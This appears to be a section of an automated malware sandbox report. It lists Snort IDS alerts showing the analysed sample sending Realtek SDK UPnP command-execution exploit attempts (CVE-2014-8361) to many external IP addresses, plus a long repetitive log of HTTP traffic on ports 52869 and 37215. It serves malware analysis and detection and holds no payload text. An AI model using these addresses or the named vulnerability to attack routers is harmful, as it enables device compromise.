Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53526 -> 45.42.95.182:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53526 -> 45.42.95.182:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 1.245.169.146:23 -> 192.168.2.23:49134
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57320 -> 185.255.45.53:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57320 -> 185.255.45.53:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57326 -> 185.255.45.53:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 66.210.126.228:23 -> 192.168.2.23:33814
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 66.210.126.228:23 -> 192.168.2.23:33814
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47894 -> 45.122.139.41:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47894 -> 45.122.139.41:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34652 -> 91.77.132.77:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34652 -> 91.77.132.77:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55724 -> 45.123.199.155:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55724 -> 45.123.199.155:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36628 -> 91.78.27.16:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:36628 -> 91.78.27.16:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34692 -> 91.77.132.77:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:36634 -> 91.78.27.16:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35416 -> 45.43.236.145:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35416 -> 45.43.236.145:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35364 -> 91.76.183.82:52869

Uses known network protocols on non-standard ports

Show sources

Source: unknown	Network traffic detected: HTTP traffic on port 58106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33720 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33724 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33720 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33724 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33720 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33724 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33720 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33724 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45730 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33112 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33112 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33112 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45730 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48862 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33116 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48866 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54094 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33724 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33720 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33112 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45730 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54094 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44346 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44348 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44346 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44348 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54094 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44346 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44348 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33116 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47454 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57800 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35248 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57810 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35258 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 57810
Source: unknown	Network traffic detected: HTTP traffic on port 45730 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33112 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44346 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44348 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54094 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60034 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57002 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57008 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47454 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57002 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34958 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50294 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33724 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33720 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47454 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50294 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44346 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44348 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50294 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43352 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34656 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50062 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50068 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35036 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50294 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34656 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43352 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35036 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47454 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54094 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60070 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45730 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33112 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49408 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 60070
Source: unknown	Network traffic detected: HTTP traffic on port 60076 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 60076
Source: unknown	Network traffic detected: HTTP traffic on port 44102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34656 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34654 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34958 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43352 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39866 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50294 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35036 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50468 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33116 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49408 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50474 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44346 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44348 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39866 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49408 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34656 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39866 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37454 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47606 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37458 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47610 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35036 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43352 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47454 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46404 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49408 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50294 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39866 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33724 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33720 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44940 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44944 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50336 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34958 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50338 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34656 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54094 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49244 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57154 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51392 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 51392
Source: unknown	Network traffic detected: HTTP traffic on port 49266 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55412 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57154 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59630 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59640 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54410 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35036 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41150 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41002 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41156 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49408 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41150 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43352 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44348 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45730 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44346 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33112 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57154 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41156 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39866 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54750 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41002 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41150 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41156 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43690 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43694 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41002 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54738 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 53340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37215 -> 54738
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41150 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36794 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57154 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41156 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51092 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33388 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47690 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55412 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50292 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36794 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33116 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50294 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47454 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33388 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47690 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41002 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54750 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42204 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42210 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56240 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60272 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60278 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 60278
Source: unknown	Network traffic detected: HTTP traffic on port 36794 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56240 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50506 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47690 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33388 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56240 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44102 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44106 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41150 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41156 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56240 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43806 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45504 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45514 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 45504
Source: unknown	Network traffic detected: HTTP traffic on port 58592 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53340 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34656 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 45514
Source: unknown	Network traffic detected: HTTP traffic on port 58596 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36794 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 57154 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47690 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33638 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33388 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56240 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45178 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41002 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43766 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55412 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33112 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34958 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43766 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46704 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39866 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49408 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43766 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49562 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35036 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46704 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41876 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43766 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55658 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40864 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55714 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56418 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 60348 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41876 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46704 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33116 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43352 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36794 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49972 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33638 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47690 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37774 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37778 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53548 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56240 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51568 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51572 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46800 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56246 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 37778 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41150 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41876 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 48288 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53084 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34198 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55658 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56974 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38414 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48026 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46800 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 46800
Source: unknown	Network traffic detected: HTTP traffic on port 46808 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43766 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54216 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41156 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43762 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53548 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33388 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54094 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 54540 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52838 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47724 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47728 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53084 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34198 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 42888 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 46704 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56974 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 46800
Source: unknown	Network traffic detected: HTTP traffic on port 52869 -> 46808
Source: unknown	Network traffic detected: HTTP traffic on port 33720 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 33724 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53548 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 41876 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55658 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55670 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 52838 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34198 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 53084 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39946 -> 52869
